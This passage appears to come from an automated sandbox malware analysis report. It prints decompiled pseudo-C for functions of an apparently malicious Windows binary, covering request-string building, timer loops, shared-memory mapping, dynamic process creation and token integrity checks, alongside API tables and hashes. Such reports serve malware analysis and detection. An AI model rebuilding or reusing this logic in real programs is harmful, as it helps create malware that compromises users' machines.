                            • Instruction ID: 0154ff5aaf0cd0d5a2c7495ee2e0aab45ce5a3a371dd93172d69a7c947a0c9da
                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                            • Instruction Fuzzy Hash: ADF01CB690020CBFEB119FA5CC85DAFBBBDEB44394B104979B152E1094D631AE489A60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F16367, Relevance: 31.7, APIs: 21, Instructions: 180memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 63%
                            			E00F16367(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a16, void* _a24, intOrPtr _a32, void* _a40) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v12;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v52;
				void* __edi;
				long _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t57;
				intOrPtr* _t59;
				void* _t60;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t78;
				int _t81;
				void* _t83;
				void* _t84;
				void* _t88;
				intOrPtr _t90;
				long _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				int _t95;
				void* _t96;
				void* _t97;
				void* _t100;
				void* _t102;

				_t88 = __edx;
				_t84 = __ecx;
				_t30 = __eax;
				_t100 =  &_v12;
				_t83 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t30 = GetTickCount();
				}
				_t31 =  *0xf1d018; // 0xad359284
				asm("bswap eax");
				_t32 =  *0xf1d014; // 0x3a87c8cd
				asm("bswap eax");
				_t33 =  *0xf1d010; // 0xd8d2f808
				asm("bswap eax");
				_t34 =  *0xf1d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t35 =  *0xf1d2b8; // 0x48da5a8
				_t95 = wsprintfA(_t83, _t35 + 0xf1e633, 2, 0x3f87e, _t34, _t33, _t32, _t31,  *0xf1d02c,  *0xf1d004, _t30);
				_t38 = E00F18DA6();
				_t39 =  *0xf1d2b8; // 0x48da5a8
				_t42 = wsprintfA(_t95 + _t83, _t39 + 0xf1e673, _t38);
				_t102 = _t100 + 0x38;
				_t96 = _t95 + _t42; // executed
				_t43 = E00F140AC(_t84); // executed
				_a32 = _t43;
				if(_t43 != 0) {
					_t78 =  *0xf1d2b8; // 0x48da5a8
					_t81 = wsprintfA(_t96 + _t83, _t78 + 0xf1e8b2, _t43);
					_t102 = _t102 + 0xc;
					_t96 = _t96 + _t81;
					HeapFree( *0xf1d270, 0, _a40);
				}
				_t44 = E00F18941();
				_a32 = _t44;
				if(_t44 != 0) {
					_t74 =  *0xf1d2b8; // 0x48da5a8
					wsprintfA(_t96 + _t83, _t74 + 0xf1e885, _t44);
					HeapFree( *0xf1d270, 0, _a40);
				}
				_t90 =  *0xf1d35c; // 0x57f95b0
				_t46 = E00F13FB8(0xf1d00a, _t90 + 4);
				_t92 = 0;
				_a8 = _t46;
				if(_t46 != 0) {
					_t49 = RtlAllocateHeap( *0xf1d270, 0, 0x800); // executed
					_a24 = _t49;
					if(_t49 != 0) {
						E00F147EF(GetTickCount());
						_t53 =  *0xf1d35c; // 0x57f95b0
						__imp__(_t53 + 0x40);
						asm("lock xadd [eax], ecx");
						_t57 =  *0xf1d35c; // 0x57f95b0
						__imp__(_t57 + 0x40);
						_t59 =  *0xf1d35c; // 0x57f95b0
						_t60 = E00F1A7FB(1, _t88, _t83,  *_t59); // executed
						_t97 = _t60;
						asm("lock xadd [eax], ecx");
						if(_t97 != 0) {
							StrTrimA(_t97, 0xf1c2ac);
							_push(_t97);
							_t65 = E00F16F6D();
							_v20 = _t65;
							if(_t65 != 0) {
								_t93 = __imp__;
								 *_t93(_t97, _v0);
								 *_t93(_a4, _v20);
								_t94 = __imp__;
								 *_t94(_v4, _v32);
								 *_t94(_v12, _t97);
								_t71 = E00F13B55(0xffffffffffffffff, _v20, _v28, _v24); // executed
								_v52 = _t71;
								if(_t71 != 0 && _t71 != 0x10d2) {
									E00F155F1();
								}
								RtlFreeHeap( *0xf1d270, 0, _v48); // executed
								_t92 = 0;
							}
							HeapFree( *0xf1d270, _t92, _t97);
						}
						RtlFreeHeap( *0xf1d270, _t92, _a16); // executed
					}
					HeapFree( *0xf1d270, _t92, _v0);
				}
				RtlFreeHeap( *0xf1d270, _t92, _t83); // executed
				return _a4;
			}















































                            0x00f16367
                            0x00f16367
                            0x00f16367
                            0x00f16367
                            0x00f1636d
                            0x00f16374
                            0x00f1637c
                            0x00f1637e
                            0x00f1637e
                            0x00f1638b
                            0x00f16396
                            0x00f16399
                            0x00f163a4
                            0x00f163a7
                            0x00f163ac
                            0x00f163af
                            0x00f163b4
                            0x00f163b7
                            0x00f163d0
                            0x00f163d2
                            0x00f163d8
                            0x00f163e8
                            0x00f163ea
                            0x00f163ed
                            0x00f163ef
                            0x00f163fc
                            0x00f16400
                            0x00f16403
                            0x00f16413
                            0x00f16415
                            0x00f1641c
                            0x00f16426
                            0x00f16426
                            0x00f16428
                            0x00f1642f
                            0x00f16433
                            0x00f16436
                            0x00f16445
                            0x00f16456
                            0x00f16456
                            0x00f16458
                            0x00f16466
                            0x00f1646b
                            0x00f1646f
                            0x00f16473
                            0x00f16485
                            0x00f1648d
                            0x00f16491
                            0x00f1649d
                            0x00f164a2
                            0x00f164ab
                            0x00f164bc
                            0x00f164c0
                            0x00f164c9
                            0x00f164cf
                            0x00f164d7
                            0x00f164dc
                            0x00f164e9
                            0x00f164ef
                            0x00f164fb
                            0x00f16501
                            0x00f16502
                            0x00f16509
                            0x00f1650d
                            0x00f16513
                            0x00f1651a
                            0x00f16524
                            0x00f1652a
                            0x00f16534
                            0x00f1653b
                            0x00f16549
                            0x00f16550
                            0x00f16554
                            0x00f1655d
                            0x00f1655d
                            0x00f1656e
                            0x00f16570
                            0x00f16570
                            0x00f1657a
                            0x00f1657a
                            0x00f16587
                            0x00f16587
                            0x00f16594
                            0x00f16594
                            0x00f1659e
                            0x00f165ab

                            APIs
                            • GetTickCount.KERNEL32 ref: 00F1637E
                              • Part of subcall function 00F1A7FB: lstrlen.KERNEL32(00000000,?,00000000,00000000,?,?,75145520,00F164DC,?,057F95B0), ref: 00F1A826
                              • Part of subcall function 00F1A7FB: lstrlen.KERNEL32(?,?,75145520,00F164DC,?,057F95B0), ref: 00F1A82E
                              • Part of subcall function 00F1A7FB: strcpy.NTDLL ref: 00F1A845
                              • Part of subcall function 00F1A7FB: lstrcat.KERNEL32(00000000,?), ref: 00F1A850
                              • Part of subcall function 00F1A7FB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00F164DC,?,75145520,00F164DC,?,057F95B0), ref: 00F1A86D
                            • wsprintfA.USER32 ref: 00F163CB
                            • wsprintfA.USER32 ref: 00F163E8
                            • wsprintfA.USER32 ref: 00F16413
                            • HeapFree.KERNEL32(00000000,?), ref: 00F16426
                            • wsprintfA.USER32 ref: 00F16445
                            • HeapFree.KERNEL32(00000000,?), ref: 00F16456
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00F16485
                            • GetTickCount.KERNEL32 ref: 00F16497
                            • RtlEnterCriticalSection.NTDLL(057F9570), ref: 00F164AB
                            • RtlLeaveCriticalSection.NTDLL(057F9570), ref: 00F164C9
                            • StrTrimA.SHLWAPI(00000000,00F1C2AC,?,057F95B0), ref: 00F164FB
                              • Part of subcall function 00F16F6D: lstrlen.KERNEL32(057F9B58,00000000,00000000,?,00F16507,00000000), ref: 00F16F7D
                              • Part of subcall function 00F16F6D: lstrlen.KERNEL32(?), ref: 00F16F85
                              • Part of subcall function 00F16F6D: lstrcpy.KERNEL32(00000000,057F9B58), ref: 00F16F99
                              • Part of subcall function 00F16F6D: lstrcat.KERNEL32(00000000,?), ref: 00F16FA4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00F1651A
                            • lstrcpy.KERNEL32(?,?), ref: 00F16524
                            • lstrcat.KERNEL32(?,?), ref: 00F16534
                            • lstrcat.KERNEL32(?,00000000), ref: 00F1653B
                            • RtlFreeHeap.NTDLL(00000000,?,?,?,?), ref: 00F1656E
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00F1657A
                            • RtlFreeHeap.NTDLL(00000000,?,?,057F95B0), ref: 00F16587
                            • HeapFree.KERNEL32(00000000,?), ref: 00F16594
                            • RtlFreeHeap.NTDLL(00000000,?), ref: 00F1659E
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Heap$Free$lstrcatlstrlenwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                            • String ID:
                            • API String ID: 1384543093-0
                            • Opcode ID: e28fb58f8b94f6b38b13a4f2102206cee4903abe488ae2a992d119628fa9ede8
                            • Instruction ID: b0681de2d9337ca9ccfa5b84681ac6543add1dfa5460d21e06e7bf7513e655ce
                            • Opcode Fuzzy Hash: e28fb58f8b94f6b38b13a4f2102206cee4903abe488ae2a992d119628fa9ede8
                            • Instruction Fuzzy Hash: 2D51DA71500248AFCB11AB69EC05EEA7BF9FF88354F0A8528F458D2231CB35D945EF62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F15038, Relevance: 16.7, APIs: 11, Instructions: 152timememoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E00F15038(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				intOrPtr _v120;
				struct %anon52 _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				struct %anon52 _t65;
				intOrPtr _t67;
				void* _t68;
				void* _t72;
				signed int _t73;
				void* _t75;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t75 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xf1d278);
					_v76 = 0;
					_v80 = 0;
					L00F1B030();
					_v84.LowPart = _t46;
					_v80 = _t75;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0xf1d2a4; // 0x2e8
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xf1d284 = 5;
						} else {
							_t68 = E00F14C56(_t75); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0xf1d298 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t73 = _v104.LowPart;
						_t58 = _t73 << 4;
						_t78 = _t89 + (_t73 << 4) + 0x3c;
						_t74 = _t73 + 1;
						_v92.LowPart = _t73 + 1;
						_t60 = E00F15B5B(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
						_v128.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v92;
						_t97 = _t65 - 3;
						_v104.LowPart = _t65;
						if(_t65 != 3) {
							goto L6;
						} else {
							_t67 = E00F16006(_t74, _t97,  &_v72, _a4, _a8); // executed
							_v120 = _t67;
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xf1d27c);
							goto L21;
						} else {
							__eflags =  *0xf1d280; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E00F155F1();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xf1d280);
								L21:
								L00F1B030();
								_v104.LowPart = _t60;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								__eflags = _t64;
								_v128 = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t72 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							RtlFreeHeap( *0xf1d270, 0, _t54); // executed
						}
						_t82 =  &(_t82[4]);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

































                            0x00f15038
                            0x00f1504e
                            0x00f15052
                            0x00f15057
                            0x00f1505e
                            0x00f15066
                            0x00f1506a
                            0x00f151f2
                            0x00f15070
                            0x00f15070
                            0x00f15072
                            0x00f15077
                            0x00f15078
                            0x00f1507e
                            0x00f15082
                            0x00f15086
                            0x00f15094
                            0x00f150a2
                            0x00f150a6
                            0x00f150a8
                            0x00f150b5
                            0x00f150c1
                            0x00f150c5
                            0x00f150c9
                            0x00f150d2
                            0x00f150dd
                            0x00f150dd
                            0x00f150d4
                            0x00f150d4
                            0x00f150db
                            0x00000000
                            0x00000000
                            0x00f150db
                            0x00f150e7
                            0x00000000
                            0x00f150eb
                            0x00f150f0
                            0x00f150fb
                            0x00f150fb
                            0x00f15103
                            0x00f1510e
                            0x00f15116
                            0x00f1511f
                            0x00f15122
                            0x00f15126
                            0x00f1512d
                            0x00f15131
                            0x00000000
                            0x00000000
                            0x00f15133
                            0x00f15137
                            0x00f1513a
                            0x00f1513e
                            0x00000000
                            0x00f15140
                            0x00f1514b
                            0x00f15150
                            0x00f15150
                            0x00000000
                            0x00f15181
                            0x00f15181
                            0x00f15186
                            0x00f151a5
                            0x00f151a7
                            0x00f151ac
                            0x00f151ad
                            0x00000000
                            0x00f15188
                            0x00f15188
                            0x00f1518e
                            0x00000000
                            0x00f15190
                            0x00f15190
                            0x00f15195
                            0x00f15197
                            0x00f1519c
                            0x00f1519d
                            0x00f151b3
                            0x00f151b3
                            0x00f151bb
                            0x00f151c9
                            0x00f151cd
                            0x00f151d9
                            0x00f151db
                            0x00f151dd
                            0x00f151e1
                            0x00000000
                            0x00f151e7
                            0x00000000
                            0x00f151e7
                            0x00f151e1
                            0x00f1518e
                            0x00000000
                            0x00f15186
                            0x00f15154
                            0x00f15156
                            0x00f1515a
                            0x00f1515b
                            0x00f1515b
                            0x00f1515f
                            0x00f15169
                            0x00f15169
                            0x00f1516f
                            0x00f15172
                            0x00f15172
                            0x00f15179
                            0x00f15179
                            0x00f15200
                            0x00000000

                            APIs
                            • memset.NTDLL ref: 00F15052
                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00F1505E
                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00F15086
                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 00F150A6
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,00F15A39,?), ref: 00F150C1
                            • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00F15A39,?,00000000), ref: 00F15169
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00F15A39,?,00000000,?,?), ref: 00F15179
                            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00F151B3
                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 00F151CD
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00F151D9
                              • Part of subcall function 00F14C56: StrToIntExW.SHLWAPI(?,00000000,?,?,?,057F93B8,00000000,?,7519F710,00000000,7519F730), ref: 00F14CA5
                              • Part of subcall function 00F14C56: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,?,057F93F0,?,00000000,?,00000014,?,057F93AC), ref: 00F14D42
                              • Part of subcall function 00F14C56: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00F150D9), ref: 00F14D54
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00F15A39,?,00000000,?,?), ref: 00F151EC
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                            • String ID:
                            • API String ID: 3521023985-0
                            • Opcode ID: aa12d4de0102dbaf1f64b0eb2c56452a9cb17080ba2450676c48bfe746185877
                            • Instruction ID: a7602178f0e427e1b0b102430d3cf20436e5454355bcf3eb2141acc2fa4a0b20
                            • Opcode Fuzzy Hash: aa12d4de0102dbaf1f64b0eb2c56452a9cb17080ba2450676c48bfe746185877
                            • Instruction Fuzzy Hash: 3A516A71409325FFD7119F159C44ADBBBE8EB89764F108A1AF464D21A0D770C944EFA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F15C7F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 70%
                            			E00F15C7F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00F1B02A();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xf1d2b8; // 0x48da5a8
				_t5 = _t13 + 0xf1e876; // 0x57f8e1e
				_push(_t13 + 0xf1e59c);
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00F1AD4A();
				_t17 = CreateFileMappingW(0xffffffff, 0xf1d2e4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                            0x00f15c7f
                            0x00f15c87
                            0x00f15c8b
                            0x00f15c91
                            0x00f15c96
                            0x00f15c9b
                            0x00f15c9e
                            0x00f15ca1
                            0x00f15ca6
                            0x00f15ca7
                            0x00f15caa
                            0x00f15caf
                            0x00f15cbc
                            0x00f15cc0
                            0x00f15cc2
                            0x00f15cc3
                            0x00f15cc6
                            0x00f15ce2
                            0x00f15ce8
                            0x00f15cec
                            0x00f15d3a
                            0x00f15cee
                            0x00f15cfb
                            0x00f15d0b
                            0x00f15d13
                            0x00f15d25
                            0x00f15d29
                            0x00000000
                            0x00000000
                            0x00f15d15
                            0x00f15d18
                            0x00f15d1d
                            0x00f15d1f
                            0x00f15d1f
                            0x00f15cfd
                            0x00f15cff
                            0x00f15d2b
                            0x00f15d2c
                            0x00f15d2c
                            0x00f15cfb
                            0x00f15d41

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,00F1590B,?,?,?,?,?), ref: 00F15C8B
                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00F15CA1
                            • _snwprintf.NTDLL ref: 00F15CC6
                            • CreateFileMappingW.KERNELBASE(000000FF,00F1D2E4,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 00F15CE2
                            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00F1590B,?,?,?,?), ref: 00F15CF4
                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00F15D0B
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,00F1590B,?,?,?), ref: 00F15D2C
                            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00F1590B,?,?,?,?), ref: 00F15D34
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                            • String ID:
                            • API String ID: 1814172918-0
                            • Opcode ID: 76f027978750d210ffb5f04958925bc4a547577f96972135c3af0045a6278fee
                            • Instruction ID: d8c18eb3875333f6021f89416857a52be02aa63a3b89b772436ef2a4f543c3a5
                            • Opcode Fuzzy Hash: 76f027978750d210ffb5f04958925bc4a547577f96972135c3af0045a6278fee
                            • Instruction Fuzzy Hash: 5C21EB72941608FBD711DB64DC09FDD77B9AF88B10F218125F505E71E0D770D945AB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F187A1, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E00F187A1(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E00F16CE5(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E00F1AA99( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0xf1d298 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0xf1d2b8; // 0x48da5a8
					_t68 = E00F170F1(_t47 + 0xf1e3b3);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0xf1d2b8; // 0x48da5a8
						_t19 = _t50 + 0xf1e760; // 0x57f8d08
						_t71 = GetProcAddress(GetModuleHandleA(_t50 + 0xf1e0af), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E00F12522();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E00F12522();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xf1d270, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E00F16DFA(_t70);
				goto L12;
			}


















                            0x00f187a9
                            0x00f187a9
                            0x00f187b8
                            0x00f187c1
                            0x00f187c4
                            0x00f188d1
                            0x00f188d8
                            0x00f188d8
                            0x00f187d3
                            0x00f187db
                            0x00f187e0
                            0x00f187e3
                            0x00f187f8
                            0x00f187fe
                            0x00f187ff
                            0x00f18802
                            0x00f18808
                            0x00f1880b
                            0x00f18810
                            0x00f18824
                            0x00f18828
                            0x00f188b8
                            0x00f1882e
                            0x00f1882e
                            0x00f18833
                            0x00f1884e
                            0x00f18852
                            0x00f188a1
                            0x00f18854
                            0x00f18855
                            0x00f1885c
                            0x00f18875
                            0x00f18877
                            0x00f1887b
                            0x00f18882
                            0x00f1889c
                            0x00f18884
                            0x00f1888d
                            0x00f18892
                            0x00f18892
                            0x00f18882
                            0x00f188b0
                            0x00f188b0
                            0x00f18828
                            0x00f188bf
                            0x00f188c8
                            0x00f188cc
                            0x00000000

                            APIs
                              • Part of subcall function 00F16CE5: GetModuleHandleA.KERNEL32(?,00000020,?,74183966,00000000,?,?,?,00F187BD,?,?,?,?,00000000,00000000), ref: 00F16D0A
                              • Part of subcall function 00F16CE5: GetProcAddress.KERNEL32(00000000,?), ref: 00F16D2C
                              • Part of subcall function 00F16CE5: GetProcAddress.KERNEL32(00000000,?), ref: 00F16D42
                              • Part of subcall function 00F16CE5: GetProcAddress.KERNEL32(00000000,?), ref: 00F16D58
                              • Part of subcall function 00F16CE5: GetProcAddress.KERNEL32(00000000,?), ref: 00F16D6E
                              • Part of subcall function 00F16CE5: GetProcAddress.KERNEL32(00000000,?), ref: 00F16D84
                            • memset.NTDLL ref: 00F1880B
                              • Part of subcall function 00F170F1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00F18824,?), ref: 00F17102
                              • Part of subcall function 00F170F1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00F1711C
                            • GetModuleHandleA.KERNEL32(?,057F8D08,?), ref: 00F18841
                            • GetProcAddress.KERNEL32(00000000), ref: 00F18848
                            • HeapFree.KERNEL32(00000000,00000000), ref: 00F188B0
                              • Part of subcall function 00F12522: GetProcAddress.KERNEL32(?,00F16342), ref: 00F1253D
                            • CloseHandle.KERNEL32(00000000,00000001), ref: 00F1888D
                            • CloseHandle.KERNEL32(?), ref: 00F18892
                            • GetLastError.KERNEL32(00000001), ref: 00F18896
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                            • String ID:
                            • API String ID: 3075724336-0
                            • Opcode ID: 14a7e5e99b9da7958fba8ae051eb5ea690dcd20dddcc06ded31b1e9bb1abcc2b
                            • Instruction ID: 17de7c63eec3e518ff50d0749ad136d7c280d75219152d8ca16a1ad87a82e553
                            • Opcode Fuzzy Hash: 14a7e5e99b9da7958fba8ae051eb5ea690dcd20dddcc06ded31b1e9bb1abcc2b
                            • Instruction Fuzzy Hash: 0C317EB6C00208EFDB10AFA4CD84DDEBBB8EB08354F154465E506E3161D7759E85EBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F14DCF, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F14DCF(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xf1d294 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00F155DC(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00F16DFA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                            0x00f14ddc
                            0x00f14de3
                            0x00f14dea
                            0x00f14dfe
                            0x00f14e09
                            0x00f14e21
                            0x00f14e2e
                            0x00f14e31
                            0x00f14e36
                            0x00f14e41
                            0x00f14e45
                            0x00f14e54
